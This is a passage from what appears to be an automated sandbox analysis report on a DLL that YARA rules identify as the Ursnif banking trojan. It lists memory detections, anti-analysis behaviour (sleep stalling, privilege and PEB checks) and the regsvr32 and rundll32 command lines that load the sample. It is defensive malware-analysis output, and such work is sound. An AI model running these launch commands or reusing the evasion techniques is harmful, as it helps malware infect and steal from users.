                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_00970397 push dword ptr [esp+10h]; ret 5_2_009703EF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0097009C push dword ptr [ebp-0000027Ch]; ret 5_2_00970231
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0097009C push dword ptr [ebp-00000284h]; ret 5_2_00970284
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0097009C push dword ptr [esp+10h]; ret 5_2_00970396
                      Source: qT9Qk5aKTk.dllStatic PE information: section name:
                      Source: qT9Qk5aKTk.dllStatic PE information: section name:
                      Source: qT9Qk5aKTk.dllStatic PE information: section name:
                      Source: qT9Qk5aKTk.dllStatic PE information: section name:
                      Source: qT9Qk5aKTk.dllStatic PE information: section name:
                      Source: qT9Qk5aKTk.dllStatic PE information: section name:
                      Source: qT9Qk5aKTk.dllStatic PE information: section name:
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00401745 LoadLibraryA,GetProcAddress,0_2_00401745
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\qT9Qk5aKTk.dll

                      Hooking and other Techniques for Hiding and Protection:

                      barindex
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 00000003.00000003.364222279.0000000005318000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.468105899.0000000003008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.468188061.0000000003008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.364616223.0000000005318000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.649016082.0000000003008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.375358568.00000000010A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000002.652107409.0000000005028000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000003.414632336.0000000005028000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.375444270.00000000010A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.468218845.0000000003008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.651754848.0000000005318000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.375275190.00000000010A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.364320937.0000000005318000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.364389953.0000000005318000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.375222083.00000000010A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.468255149.0000000003008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000003.414450322.0000000005028000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000003.414502049.0000000005028000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.375580970.00000000010A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.333121153.0000000006AF8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.648129313.00000000010A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.468276277.0000000003008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.375181159.00000000010A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.364453388.0000000005318000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000003.414320429.0000000005028000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000003.414602020.0000000005028000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.468293136.0000000003008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000003.414538088.0000000005028000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.468154438.0000000003008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.375508831.00000000010A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000003.414382047.0000000005028000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.364561415.0000000005318000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.375609486.00000000010A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.468055904.0000000003008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.364525253.0000000005318000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.364645701.0000000005318000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000003.414418494.0000000005028000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 1132, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 3528, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 572, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6420, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5852, type: MEMORYSTR
                      Source: Yara matchFile source: 12.2.rundll32.exe.3380000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 27.2.rundll32.exe.d50000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.2.rundll32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 26.2.rundll32.exe.4420000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.5e0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.2.rundll32.exe.c70000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.5e0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.ee0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 33.2.rundll32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.a90000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.rundll32.exe.33c0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 29.2.rundll32.exe.34b0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.e90000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 35.2.rundll32.exe.30f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.2.rundll32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.e70000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.rundll32.exe.a10000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.ed0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.6a0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.e70000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 34.2.rundll32.exe.ec0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.d40000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000002.00000002.646505839.00000000006A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.647248023.0000000000E70000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.646366246.00000000005E0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000026.00000002.420703816.0000000000DC0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001A.00000002.369842357.0000000004420000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000029.00000002.429260721.0000000000B90000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002A.00000002.446457237.0000000002FF0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000002.395181120.0000000000EC0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.304746856.0000000000ED0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.644892830.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.644375086.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000002.644275596.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000023.00000002.404550110.00000000030F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002B.00000002.458755671.00000000009E0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.325365679.0000000003380000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.358824695.0000000000A10000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000024.00000002.413264520.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.330683030.0000000000A90000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000002.646583406.0000000000C70000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.298453588.0000000000E70000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.342607248.00000000033C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.290124643.0000000000D40000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.346644009.0000000000E90000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001D.00000002.378757708.00000000034B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001B.00000002.365645310.0000000000D50000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.645252474.0000000000EE0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000002.385594405.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                      Source: C:\Windows\System32\loaddll32.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion:

                      barindex
                      Found stalling execution ending in API Sleep callShow sources
                      Source: C:\Windows\SysWOW64\rundll32.exeStalling execution: Execution stalls by calling Sleep
                      Source: C:\Windows\SysWOW64\regsvr32.exe TID: 6528Thread sleep time: -1667865539s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exe TID: 6528Thread sleep count: 224 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exe TID: 6528Thread sleep time: -112000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeLast function: Thread delayed
                      Source: C:\Windows\System32\loaddll32.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\regsvr32.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\regsvr32.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\rundll32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                      Source: C:\Windows\SysWOW64\regsvr32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                      Source: C:\Windows\System32\loaddll32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00EC12D4 RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,0_2_00EC12D4
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_00C812D4 RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,2_2_00C812D4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04B312D4 RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,10_2_04B312D4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_054712D4 RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,12_2_054712D4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_04F412D4 RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,17_2_04F412D4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 29_2_052D12D4 RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,29_2_052D12D4
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00401745 LoadLibraryA,GetProcAddress,0_2_00401745
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00E403F0 mov eax, dword ptr fs:[00000030h]0_2_00E403F0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00E40397 mov eax, dword ptr fs:[00000030h]0_2_00E40397
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00E4009C mov eax, dword ptr fs:[00000030h]0_2_00E4009C
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00E40469 mov eax, dword ptr fs:[00000030h]0_2_00E40469
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00BF009C mov eax, dword ptr fs:[00000030h]3_2_00BF009C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00BF0397 mov eax, dword ptr fs:[00000030h]3_2_00BF0397
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00BF03F0 mov eax, dword ptr fs:[00000030h]3_2_00BF03F0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00BF0469 mov eax, dword ptr fs:[00000030h]3_2_00BF0469
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_00970397 mov eax, dword ptr fs:[00000030h]5_2_00970397
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_009703F0 mov eax, dword ptr fs:[00000030h]5_2_009703F0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0097009C mov eax, dword ptr fs:[00000030h]5_2_0097009C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_00970469 mov eax, dword ptr fs:[00000030h]5_2_00970469
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00CA0469 mov eax, dword ptr fs:[00000030h]7_2_00CA0469
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00CA009C mov eax, dword ptr fs:[00000030h]7_2_00CA009C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00CA03F0 mov eax, dword ptr fs:[00000030h]7_2_00CA03F0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00CA0397 mov eax, dword ptr fs:[00000030h]7_2_00CA0397
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00C90469 mov eax, dword ptr fs:[00000030h]9_2_00C90469
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00C9009C mov eax, dword ptr fs:[00000030h]9_2_00C9009C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00C903F0 mov eax, dword ptr fs:[00000030h]9_2_00C903F0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00C90397 mov eax, dword ptr fs:[00000030h]9_2_00C90397
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00A8009C mov eax, dword ptr fs:[00000030h]10_2_00A8009C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00A80469 mov eax, dword ptr fs:[00000030h]10_2_00A80469
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00A80397 mov eax, dword ptr fs:[00000030h]10_2_00A80397
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00A803F0 mov eax, dword ptr fs:[00000030h]10_2_00A803F0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_03370397 mov eax, dword ptr fs:[00000030h]12_2_03370397
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_033703F0 mov eax, dword ptr fs:[00000030h]12_2_033703F0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_03370469 mov eax, dword ptr fs:[00000030h]12_2_03370469
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0337009C mov eax, dword ptr fs:[00000030h]12_2_0337009C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_033B009C mov eax, dword ptr fs:[00000030h]20_2_033B009C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_033B03F0 mov eax, dword ptr fs:[00000030h]20_2_033B03F0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_033B0397 mov eax, dword ptr fs:[00000030h]20_2_033B0397
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_033B0469 mov eax, dword ptr fs:[00000030h]20_2_033B0469
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_043F009C mov eax, dword ptr fs:[00000030h]26_2_043F009C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_043F0397 mov eax, dword ptr fs:[00000030h]26_2_043F0397
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_043F03F0 mov eax, dword ptr fs:[00000030h]26_2_043F03F0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_043F0469 mov eax, dword ptr fs:[00000030h]26_2_043F0469
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 27_2_00BC009C mov eax, dword ptr fs:[00000030h]27_2_00BC009C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 27_2_00BC0397 mov eax, dword ptr fs:[00000030h]27_2_00BC0397
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 27_2_00BC03F0 mov eax, dword ptr fs:[00000030h]27_2_00BC03F0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 27_2_00BC0469 mov eax, dword ptr fs:[00000030h]27_2_00BC0469
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 33_2_001E009C mov eax, dword ptr fs:[00000030h]33_2_001E009C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 33_2_001E0397 mov eax, dword ptr fs:[00000030h]33_2_001E0397
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 33_2_001E03F0 mov eax, dword ptr fs:[00000030h]33_2_001E03F0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 33_2_001E0469 mov eax, dword ptr fs:[00000030h]33_2_001E0469
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 35_2_030E0469 mov eax, dword ptr fs:[00000030h]35_2_030E0469
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 35_2_030E009C mov eax, dword ptr fs:[00000030h]35_2_030E009C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 35_2_030E0397 mov eax, dword ptr fs:[00000030h]35_2_030E0397
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 35_2_030E03F0 mov eax, dword ptr fs:[00000030h]35_2_030E03F0
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\qT9Qk5aKTk.dll',#1Jump to behavior
                      Source: loaddll32.exe, 00000000.00000002.647599368.0000000001100000.00000002.00020000.sdmp, regsvr32.exe, 00000002.00000002.650368021.0000000003110000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.650410553.0000000003460000.00000002.00020000.sdmp, rundll32.exe, 0000001F.00000002.651017968.00000000032A0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: loaddll32.exe, 00000000.00000002.647599368.0000000001100000.00000002.00020000.sdmp, regsvr32.exe, 00000002.00000002.650368021.0000000003110000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.650410553.0000000003460000.00000002.00020000.sdmp, rundll32.exe, 0000001F.00000002.651017968.00000000032A0000.00000002.00020000.sdmpBinary or memory string: Progman
